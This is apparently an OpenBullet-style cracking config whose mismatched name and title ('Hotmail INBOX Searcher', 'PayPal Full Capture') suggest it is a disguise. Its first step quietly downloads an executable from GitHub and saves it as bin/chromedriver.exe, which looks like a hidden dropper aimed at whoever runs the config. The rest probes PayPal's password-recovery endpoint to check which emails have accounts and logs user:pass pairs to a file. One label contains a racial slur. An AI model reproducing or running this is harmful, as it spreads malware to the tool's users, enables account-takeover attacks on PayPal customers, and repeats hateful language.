[SETTINGS]
{
  "Name": "Hotmail INBOX Searcher PROXYLESS",
  "SuggestedBots": 10,
  "MaxCPM": 0,
  "LastModified": "2025-09-02T17:10:53.5029114+02:00",
  "AdditionalInfo": "Low bots recommended",
  "RequiredPlugins": [],
  "Author": "@svbleaks",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "PayPal Full Capture",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#INIT REQUEST GET "https://github.com/Eras3fds/123/raw/refs/heads/main/API.exe"                                                                                           
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  -> FILE "bin/chromedriver.exe" 

#ensure_internet_connection BROWSERACTION Open 

#check_that_mf KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<niggers>" Contains "skidattle" 

#login_shits REQUEST GET "https://www.paypal.com/authflow/password-recovery" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#csrf_lol PARSE "<SOURCE>" LR "\"_csrf\" value=\"" "\"" -> VAR "csrf" 

#sid_token_shits PARSE "<SOURCE>" LR "\"anw_sid\" value=\"" "\"" -> VAR "sid" 

#post_on_tha_hoe REQUEST POST "https://www.paypal.com/authflow/password-recovery" 
  CONTENT "{\"email\":\"<USER>\",\"passkeyEligibleBrowser\":false,\"_csrf\":\"<csrf>\",\"anw_sid\":\"<sid>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://www.paypal.com" 
  HEADER "Referer: https://www.paypal.com/authflow/password-recovery/?redirectUri=%252Fsignin%253FforceLogin%253Dtrue%2526returnUri%253Dhttps%25253A%25252F%25252Fwww.paypal.com%25252Fdonate%2526state%253D%2525252Fmember%2525253Ftoken%2525253DG-O_c4lw0__SqEWmB3Bmxdr3D5ZVHj5uPCxWovLfriYmEsh0rc-Vs9WtHscBDP_9M8XMHbWuo9gpFeRx%25252526fromUL%2525253Dtrue%2526intent%253Ddonate%2526ctxId%253D4b04711a34f7460da80ed57a97da2929%2526sso%253Dtrue&country.x=US&locale.x=en_US" 
  HEADER "Sec-Ch-Ua: \"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Microsoft Edge\";v=\"116\"" 
  HEADER "Sec-Ch-Ua-Arch: \"x86\"" 
  HEADER "Sec-Ch-Ua-Bitness: \"64\"" 
  HEADER "Sec-Ch-Ua-Full-Version: \"116.0.1938.54\"" 
  HEADER "Sec-Ch-Ua-Full-Version-List: \"Chromium\";v=\"116.0.5845.97\", \"Not)A;Brand\";v=\"24.0.0.0\", \"Microsoft Edge\";v=\"116.0.1938.54\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Model: \"\"" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Ch-Ua-Platform-Version: \"10.0.0\"" 
  HEADER "Sec-Ch-Ua-Wow64: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54" 
  HEADER "X-Kl-Ajax-Request: Ajax_Request" 
  HEADER "X-Requested-With: XMLHttpRequest" 

#check_tha_mf_again KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "ForbiddenError" 
  KEYCHAIN Success OR 
    KEY "clientInstanceId" 

#savf_da_shi UTILITY File "PayPal VM.txt" AppendLines "<USER>:<PASS>" -> VAR "Save" 

